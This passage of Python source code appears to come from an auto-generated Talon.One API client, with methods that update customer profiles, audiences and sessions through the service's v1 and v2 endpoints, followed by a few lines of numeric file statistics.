    if self.api_client.client_side_validation and local_var_params.get('body') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `body` when calling `track_event`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    query_params = []
    if local_var_params.get('dry') is not None:  # noqa: E501
        query_params.append(('dry', local_var_params['dry']))  # noqa: E501

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }
    form_params = []
    local_var_files = {}
    body_params = local_var_params['body']

    # Authentication setting
    auth_settings = ['api_key_v1', 'integration_auth']  # noqa: E501

    return self.api_client.call_api(
        '/v1/events', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='IntegrationState',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_customer_profile(self, integration_id, body, **kwargs):  # noqa: E501
    """Update a Customer Profile V1  # noqa: E501

    ⚠️ Deprecation Notice: Support for requests to this endpoint will end
    on 15.07.2021. The endpoint will not be removed and remains
    accessible; for new features support, migrate to
    [API V2.0](/Getting-Started/APIV2). Update (or create) a
    [Customer Profile](https://developers.talon.one/Getting-Started/entities#customer-profile).
    The `integrationId` may be any identifier that remains stable for the
    customer (e.g. a database ID, email, or phone number). It must not
    change over time, so do not use any identifier the customer can
    update themselves. The response contains the full integration state:
    the customer profile, the customer session, the recorded event, and
    the effects that took place.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_customer_profile(integration_id, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str integration_id: The custom identifier for this profile, must be unique within the account. (required)
    :param NewCustomerProfile body: (required)
    :param bool dry: Indicates whether to skip persisting the changes or not (Will not persist if set to 'true').
    :param _preload_content: if False, the urllib3.HTTPResponse object will
        be returned without reading/decoding response data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
        number provided, it will be total request timeout. It can also be
        a pair (tuple) of (connection, read) timeouts.
    :return: IntegrationState
        If the method is called asynchronously,
        returns the request thread.
    """
    # Force the data-only return form and delegate to the
    # *_with_http_info variant, which performs the actual request.
    options = dict(kwargs, _return_http_data_only=True)
    return self.update_customer_profile_with_http_info(integration_id, body, **options)  # noqa: E501
def update_customer_profile_with_http_info(self, integration_id, body, **kwargs):  # noqa: E501
    """Update a Customer Profile V1  # noqa: E501

    ⚠️ Deprecation Notice: Support for requests to this endpoint will end
    on 15.07.2021. The endpoint will not be removed and remains
    accessible; for new features support, migrate to
    [API V2.0](/Getting-Started/APIV2). Update (or create) a
    [Customer Profile](https://developers.talon.one/Getting-Started/entities#customer-profile).
    The `integrationId` may be any identifier that remains stable for the
    customer (e.g. a database ID, email, or phone number). It must not
    change over time, so do not use any identifier the customer can
    update themselves. The response contains the full integration state:
    the customer profile, the customer session, the recorded event, and
    the effects that took place.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_customer_profile_with_http_info(integration_id, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str integration_id: The custom identifier for this profile, must be unique within the account. (required)
    :param NewCustomerProfile body: (required)
    :param bool dry: Indicates whether to skip persisting the changes or not (Will not persist if set to 'true').
    :param _return_http_data_only: response data without head status code
        and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
        be returned without reading/decoding response data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
        number provided, it will be total request timeout. It can also be
        a pair (tuple) of (connection, read) timeouts.
    :return: tuple(IntegrationState, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    # Collect the explicit arguments plus any recognised keyword options.
    local_var_params = {'integration_id': integration_id, 'body': body}
    recognized = [
        'integration_id',
        'body',
        'dry',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]
    for key, val in six.iteritems(kwargs):
        if key not in recognized:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_customer_profile" % key
            )
        local_var_params[key] = val

    # Both the path identifier and the request body are mandatory.
    if self.api_client.client_side_validation and local_var_params.get('integration_id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `integration_id` when calling `update_customer_profile`")  # noqa: E501
    if self.api_client.client_side_validation and local_var_params.get('body') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `body` when calling `update_customer_profile`")  # noqa: E501

    collection_formats = {}

    path_params = {'integrationId': local_var_params['integration_id']}  # noqa: E501

    query_params = []
    if local_var_params.get('dry') is not None:  # noqa: E501
        query_params.append(('dry', local_var_params['dry']))  # noqa: E501

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }
    form_params = []
    local_var_files = {}
    body_params = local_var_params['body']

    # Authentication setting
    auth_settings = ['api_key_v1', 'integration_auth']  # noqa: E501

    return self.api_client.call_api(
        '/v1/customer_profiles/{integrationId}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='IntegrationState',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_customer_profile_audiences(self, body, **kwargs):  # noqa: E501
    """Update a Customer Profile Audiences  # noqa: E501

    Update one or multiple Customer Profiles with the specified
    Audiences.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_customer_profile_audiences(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param CustomerProfileAudienceRequest body: (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
        be returned without reading/decoding response data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
        number provided, it will be total request timeout. It can also be
        a pair (tuple) of (connection, read) timeouts.
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Force the data-only return form and delegate to the
    # *_with_http_info variant, which performs the actual request.
    options = dict(kwargs, _return_http_data_only=True)
    return self.update_customer_profile_audiences_with_http_info(body, **options)  # noqa: E501
def update_customer_profile_audiences_with_http_info(self, body, **kwargs):  # noqa: E501
    """Update a Customer Profile Audiences  # noqa: E501

    Update one or multiple Customer Profiles with the specified
    Audiences.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_customer_profile_audiences_with_http_info(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param CustomerProfileAudienceRequest body: (required)
    :param _return_http_data_only: response data without head status code
        and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
        be returned without reading/decoding response data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
        number provided, it will be total request timeout. It can also be
        a pair (tuple) of (connection, read) timeouts.
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # Collect the explicit argument plus any recognised keyword options.
    local_var_params = {'body': body}
    recognized = [
        'body',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]
    for key, val in six.iteritems(kwargs):
        if key not in recognized:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_customer_profile_audiences" % key
            )
        local_var_params[key] = val

    # The request body is mandatory for this endpoint.
    if self.api_client.client_side_validation and local_var_params.get('body') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `body` when calling `update_customer_profile_audiences`")  # noqa: E501

    collection_formats = {}
    path_params = {}
    query_params = []
    # NOTE: this endpoint returns no body, so only `Content-Type` is sent
    # (no `Accept` header), matching the generated client's behaviour.
    header_params = {
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }
    form_params = []
    local_var_files = {}
    body_params = local_var_params['body']

    # Authentication setting
    auth_settings = ['api_key_v1']  # noqa: E501

    return self.api_client.call_api(
        '/v2/customer_audiences', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_customer_profile_v2(self, integration_id, body, **kwargs):  # noqa: E501
    """Update a Customer Profile  # noqa: E501

    Update (or create) a
    [Customer Profile](https://developers.talon.one/Getting-Started/entities#customer-profile).
    The `integrationId` must be an identifier that remains stable for the
    customer (e.g. a database ID); do not use an ID the customer can
    update themselves. The response carries the requested integration
    state. If `runRuleEngine` is `true` it also includes the effects of
    the triggered campaigns, created coupons and referral objects, and
    any entity requested via `responseContent`.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_customer_profile_v2(integration_id, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str integration_id: The custom identifier for this profile. Must be unique within the account. (required)
    :param CustomerProfileIntegrationRequestV2 body: (required)
    :param bool run_rule_engine: Indicates whether to run the rule engine.
    :param bool dry: Indicates whether to persist the changes. Changes are persisted with `true`. Only used when `runRuleEngine` is set to `true`.
    :param _preload_content: if False, the urllib3.HTTPResponse object will
        be returned without reading/decoding response data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
        number provided, it will be total request timeout. It can also be
        a pair (tuple) of (connection, read) timeouts.
    :return: IntegrationStateV2
        If the method is called asynchronously,
        returns the request thread.
    """
    # Force the data-only return form and delegate to the
    # *_with_http_info variant, which performs the actual request.
    options = dict(kwargs, _return_http_data_only=True)
    return self.update_customer_profile_v2_with_http_info(integration_id, body, **options)  # noqa: E501
def update_customer_profile_v2_with_http_info(self, integration_id, body, **kwargs):  # noqa: E501
    """Update a Customer Profile  # noqa: E501

    Update (or create) a
    [Customer Profile](https://developers.talon.one/Getting-Started/entities#customer-profile).
    The `integrationId` must be an identifier that remains stable for the
    customer (e.g. a database ID); do not use an ID the customer can
    update themselves. The response carries the requested integration
    state. If `runRuleEngine` is `true` it also includes the effects of
    the triggered campaigns, created coupons and referral objects, and
    any entity requested via `responseContent`.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_customer_profile_v2_with_http_info(integration_id, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str integration_id: The custom identifier for this profile. Must be unique within the account. (required)
    :param CustomerProfileIntegrationRequestV2 body: (required)
    :param bool run_rule_engine: Indicates whether to run the rule engine.
    :param bool dry: Indicates whether to persist the changes. Changes are persisted with `true`. Only used when `runRuleEngine` is set to `true`.
    :param _return_http_data_only: response data without head status code
        and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
        be returned without reading/decoding response data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
        number provided, it will be total request timeout. It can also be
        a pair (tuple) of (connection, read) timeouts.
    :return: tuple(IntegrationStateV2, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    # Collect the explicit arguments plus any recognised keyword options.
    local_var_params = {'integration_id': integration_id, 'body': body}
    recognized = [
        'integration_id',
        'body',
        'run_rule_engine',
        'dry',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]
    for key, val in six.iteritems(kwargs):
        if key not in recognized:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_customer_profile_v2" % key
            )
        local_var_params[key] = val

    # Both the path identifier and the request body are mandatory.
    if self.api_client.client_side_validation and local_var_params.get('integration_id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `integration_id` when calling `update_customer_profile_v2`")  # noqa: E501
    if self.api_client.client_side_validation and local_var_params.get('body') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `body` when calling `update_customer_profile_v2`")  # noqa: E501

    collection_formats = {}

    path_params = {'integrationId': local_var_params['integration_id']}  # noqa: E501

    # Query parameters are appended in the order the API documents them.
    query_params = []
    if local_var_params.get('run_rule_engine') is not None:  # noqa: E501
        query_params.append(('runRuleEngine', local_var_params['run_rule_engine']))  # noqa: E501
    if local_var_params.get('dry') is not None:  # noqa: E501
        query_params.append(('dry', local_var_params['dry']))  # noqa: E501

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }
    form_params = []
    local_var_files = {}
    body_params = local_var_params['body']

    # Authentication setting
    auth_settings = ['api_key_v1']  # noqa: E501

    return self.api_client.call_api(
        '/v2/customer_profiles/{integrationId}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='IntegrationStateV2',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_customer_profiles_v2(self, body, **kwargs):  # noqa: E501
    """Update multiple Customer Profiles  # noqa: E501

    Update (or create) up to 1000
    [Customer Profiles](https://developers.talon.one/Getting-Started/entities#customer-profile)
    in 1 request. The `integrationId` must be an identifier that remains
    stable for the customer (e.g. a database ID); do not use an ID the
    customer can update themselves. A customer profile
    [can be linked to one or more sessions](https://developers.talon.one/Integration-API/API-Reference#updateCustomerSessionV2).  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_customer_profiles_v2(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param MultipleCustomerProfileIntegrationRequest body: (required)
    :param str silent: If set to `yes`, response will be an empty 204, otherwise a list of integration states will be generated (up to 1000).
    :param _preload_content: if False, the urllib3.HTTPResponse object will
        be returned without reading/decoding response data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
        number provided, it will be total request timeout. It can also be
        a pair (tuple) of (connection, read) timeouts.
    :return: MultipleCustomerProfileIntegrationResponseV2
        If the method is called asynchronously,
        returns the request thread.
    """
    # Force the data-only return form and delegate to the
    # *_with_http_info variant, which performs the actual request.
    options = dict(kwargs, _return_http_data_only=True)
    return self.update_customer_profiles_v2_with_http_info(body, **options)  # noqa: E501
def update_customer_profiles_v2_with_http_info(self, body, **kwargs):  # noqa: E501
    """Update multiple Customer Profiles  # noqa: E501

    Update (or create) up to 1000
    [Customer Profiles](https://developers.talon.one/Getting-Started/entities#customer-profile)
    in 1 request. The `integrationId` must be an identifier that remains
    stable for the customer (e.g. a database ID); do not use an ID the
    customer can update themselves. A customer profile
    [can be linked to one or more sessions](https://developers.talon.one/Integration-API/API-Reference#updateCustomerSessionV2).  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_customer_profiles_v2_with_http_info(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param MultipleCustomerProfileIntegrationRequest body: (required)
    :param str silent: If set to `yes`, response will be an empty 204, otherwise a list of integration states will be generated (up to 1000).
    :param _return_http_data_only: response data without head status code
        and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
        be returned without reading/decoding response data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
        number provided, it will be total request timeout. It can also be
        a pair (tuple) of (connection, read) timeouts.
    :return: tuple(MultipleCustomerProfileIntegrationResponseV2, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    # Collect the explicit argument plus any recognised keyword options.
    local_var_params = {'body': body}
    recognized = [
        'body',
        'silent',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]
    for key, val in six.iteritems(kwargs):
        if key not in recognized:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_customer_profiles_v2" % key
            )
        local_var_params[key] = val

    # The request body is mandatory for this endpoint.
    if self.api_client.client_side_validation and local_var_params.get('body') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `body` when calling `update_customer_profiles_v2`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    query_params = []
    if local_var_params.get('silent') is not None:  # noqa: E501
        query_params.append(('silent', local_var_params['silent']))  # noqa: E501

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }
    form_params = []
    local_var_files = {}
    body_params = local_var_params['body']

    # Authentication setting
    auth_settings = ['api_key_v1']  # noqa: E501

    return self.api_client.call_api(
        '/v2/customer_profiles', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='MultipleCustomerProfileIntegrationResponseV2',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_customer_session(self, customer_session_id, body, **kwargs):  # noqa: E501
    """Update a Customer Session V1.  # noqa: E501

    ⚠️ Deprecated: support for this endpoint ended on 15.07.2021. The
    endpoint itself remains accessible, but new features land in API V2.0
    (https://developers.talon.one/Getting-Started/APIV2) — migrate there.

    Updates (or creates) a Customer Session, e.g. to mirror the items in a
    customer's cart. Multiple simultaneous sessions per profile are
    supported: share one session across access points that share state
    (such as the cart), or use independent session IDs otherwise. Link a
    session to a profile by setting ``profileId`` in the request body to
    that profile's ``integrationId``; use the empty string (`\"\"`) for an
    anonymous session. A missing profile is created automatically. The
    response carries the full integration state (profile, session, the
    recorded event, and the effects that took place). The session currency
    matches that of the associated application.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_customer_session(customer_session_id, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str customer_session_id: The custom identifier for this session,
        must be unique within the account. (required)
    :param NewCustomerSession body: (required)
    :param bool dry: Indicates whether to skip persisting the changes or
        not (Will not persist if set to 'true').
    :param _preload_content: if False, the urllib3.HTTPResponse object will
        be returned without reading/decoding response data. Default is True.
    :param _request_timeout: timeout setting for this request. A single
        number is a total timeout; a (connection, read) tuple sets both.
    :return: IntegrationState
        If the method is called asynchronously, returns the request thread.
    """
    # Callers of this convenience wrapper always want just the response
    # data, so force the flag before delegating to the full variant.
    kwargs.update(_return_http_data_only=True)
    return self.update_customer_session_with_http_info(
        customer_session_id, body, **kwargs)  # noqa: E501
def update_customer_session_with_http_info(self, customer_session_id, body, **kwargs):  # noqa: E501
    """Update a Customer Session V1.  # noqa: E501

    ⚠️ Deprecation Notice: Support for requests to this endpoint ended on
    15.07.2021. The endpoint is not removed and remains accessible; for
    new features support, migrate to API V2.0
    (https://developers.talon.one/Getting-Started/APIV2).

    Update (or create) a Customer Session, for example to represent which
    items are in the customer's cart. The platform supports multiple
    simultaneous sessions for the same profile: share one session across
    access points that share state (such as the user's cart), or track
    independent sessions when their states are independent. To link a
    session to a customer profile, set the `profileId` parameter in the
    request body to a customer profile's `integrationId`; to track an
    anonymous session use the empty string (`\"\"`) as the `profileId`.
    **Note:** you do **not** have to create a customer profile first — if
    the specified profile does not exist, an empty profile is created
    automatically. The response includes the full integration state: the
    current customer profile, the customer session, the event that was
    recorded, and an array of effects that took place. The currency for
    the session and its cart items is that of the associated application.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_customer_session_with_http_info(customer_session_id, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str customer_session_id: The custom identifier for this session,
        must be unique within the account. (required)
    :param NewCustomerSession body: (required)
    :param bool dry: Indicates whether to skip persisting the changes or
        not (Will not persist if set to 'true').
    :param _return_http_data_only: response data without head status code
        and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
        be returned without reading/decoding response data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
        number provided, it will be total request timeout. It can also be
        a pair (tuple) of (connection, read) timeouts.
    :return: tuple(IntegrationState, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously, returns the request thread.
    """
    # `locals()` snapshots the positional parameters plus the `kwargs`
    # dict; the mapping keys are the parameter names, so locals here must
    # not be renamed independently of the signature.
    local_var_params = locals()

    # Parameters specific to this endpoint...
    all_params = [
        'customer_session_id',
        'body',
        'dry'
    ]
    # ...plus the options every generated API method accepts.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )

    # Reject unexpected keyword arguments, then fold the accepted ones
    # into local_var_params so all later lookups are uniform.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_customer_session" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'customer_session_id' is set
    if self.api_client.client_side_validation and ('customer_session_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['customer_session_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `customer_session_id` when calling `update_customer_session`")  # noqa: E501
    # verify the required parameter 'body' is set
    if self.api_client.client_side_validation and ('body' not in local_var_params or  # noqa: E501
                                                   local_var_params['body'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `body` when calling `update_customer_session`")  # noqa: E501

    collection_formats = {}

    # Path template substitution for {customerSessionId} in the URL.
    path_params = {}
    if 'customer_session_id' in local_var_params:
        path_params['customerSessionId'] = local_var_params['customer_session_id']  # noqa: E501

    # Optional `dry` query parameter (skip persisting changes when true).
    query_params = []
    if 'dry' in local_var_params and local_var_params['dry'] is not None:  # noqa: E501
        query_params.append(('dry', local_var_params['dry']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in local_var_params:
        body_params = local_var_params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['api_key_v1', 'integration_auth']  # noqa: E501

    return self.api_client.call_api(
        '/v1/customer_sessions/{customerSessionId}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='IntegrationState',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_customer_session_v2(self, customer_session_id, body, **kwargs):  # noqa: E501
    """Update a Customer Session.  # noqa: E501

    Updates (or creates) a Customer Session, e.g. to mirror the items in a
    customer's cart. Multiple simultaneous sessions per profile are
    supported: share one session across access points that share state
    (such as the cart), or use independent session IDs otherwise. Link a
    session to a profile by setting ``profileId`` in the request body to
    that profile's ``integrationId``; use the empty string (`\"\"`) for an
    anonymous session. A missing profile is created automatically. The
    response contains the requested integration state; when
    ``runRuleEngine`` is ``true`` it also includes the effects generated
    by triggered campaigns, the created coupons and referral objects, and
    any entity requested in ``responseContent``. The session currency
    matches that of the associated application.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_customer_session_v2(customer_session_id, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str customer_session_id: The custom identifier for this session,
        must be unique within the account. (required)
    :param IntegrationRequest body: (required)
    :param bool dry: Indicates whether to skip persisting the changes or
        not (Will not persist if set to 'true').
    :param _preload_content: if False, the urllib3.HTTPResponse object will
        be returned without reading/decoding response data. Default is True.
    :param _request_timeout: timeout setting for this request. A single
        number is a total timeout; a (connection, read) tuple sets both.
    :return: IntegrationStateV2
        If the method is called asynchronously, returns the request thread.
    """
    # Callers of this convenience wrapper always want just the response
    # data, so force the flag before delegating to the full variant.
    kwargs.update(_return_http_data_only=True)
    return self.update_customer_session_v2_with_http_info(
        customer_session_id, body, **kwargs)  # noqa: E501
def update_customer_session_v2_with_http_info(self, customer_session_id, body, **kwargs):  # noqa: E501
    """Update a Customer Session.  # noqa: E501

    Update (or create) a Customer Session, for example to represent which
    items are in the customer's cart. The platform supports multiple
    simultaneous sessions for the same profile: share one session across
    access points that share state (such as the user's cart), or track
    independent sessions when their states are independent. To link a
    session to a customer profile, set the `profileId` parameter in the
    request body to a customer profile's `integrationId`; to track an
    anonymous session use the empty string (`\"\"`) as the `profileId`.
    **Note:** you do **not** have to create a customer profile first — if
    the specified profile does not exist, an empty profile is created
    automatically. The response contains the requested integration state.
    If `runRuleEngine` is set to `true`, the response includes: the
    effects generated by the triggered campaigns, the created coupons and
    referral objects, and any entity requested in the `responseContent`
    request parameter. The currency for the session and its cart items is
    that of the associated application.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_customer_session_v2_with_http_info(customer_session_id, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str customer_session_id: The custom identifier for this session,
        must be unique within the account. (required)
    :param IntegrationRequest body: (required)
    :param bool dry: Indicates whether to skip persisting the changes or
        not (Will not persist if set to 'true').
    :param _return_http_data_only: response data without head status code
        and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
        be returned without reading/decoding response data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
        number provided, it will be total request timeout. It can also be
        a pair (tuple) of (connection, read) timeouts.
    :return: tuple(IntegrationStateV2, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously, returns the request thread.
    """
    # `locals()` snapshots the positional parameters plus the `kwargs`
    # dict; the mapping keys are the parameter names, so locals here must
    # not be renamed independently of the signature.
    local_var_params = locals()

    # Parameters specific to this endpoint...
    all_params = [
        'customer_session_id',
        'body',
        'dry'
    ]
    # ...plus the options every generated API method accepts.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )

    # Reject unexpected keyword arguments, then fold the accepted ones
    # into local_var_params so all later lookups are uniform.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_customer_session_v2" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'customer_session_id' is set
    if self.api_client.client_side_validation and ('customer_session_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['customer_session_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `customer_session_id` when calling `update_customer_session_v2`")  # noqa: E501
    # verify the required parameter 'body' is set
    if self.api_client.client_side_validation and ('body' not in local_var_params or  # noqa: E501
                                                   local_var_params['body'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `body` when calling `update_customer_session_v2`")  # noqa: E501

    collection_formats = {}

    # Path template substitution for {customerSessionId} in the URL.
    path_params = {}
    if 'customer_session_id' in local_var_params:
        path_params['customerSessionId'] = local_var_params['customer_session_id']  # noqa: E501

    # Optional `dry` query parameter (skip persisting changes when true).
    query_params = []
    if 'dry' in local_var_params and local_var_params['dry'] is not None:  # noqa: E501
        query_params.append(('dry', local_var_params['dry']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in local_var_params:
        body_params = local_var_params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['api_key_v1']  # noqa: E501

    return self.api_client.call_api(
        '/v2/customer_sessions/{customerSessionId}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='IntegrationStateV2',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
| 56.135184
| 1,764
| 0.632687
| 11,029
| 93,016
| 5.14072
| 0.037809
| 0.035134
| 0.052595
| 0.020636
| 0.968146
| 0.966365
| 0.96252
| 0.961762
| 0.951126
| 0.946734
| 0
| 0.014255
| 0.298615
| 93,016
| 1,656
| 1,765
| 56.169082
| 0.854675
| 0.536811
| 0
| 0.765664
| 0
| 0
| 0.190115
| 0.053564
| 0
| 0
| 0
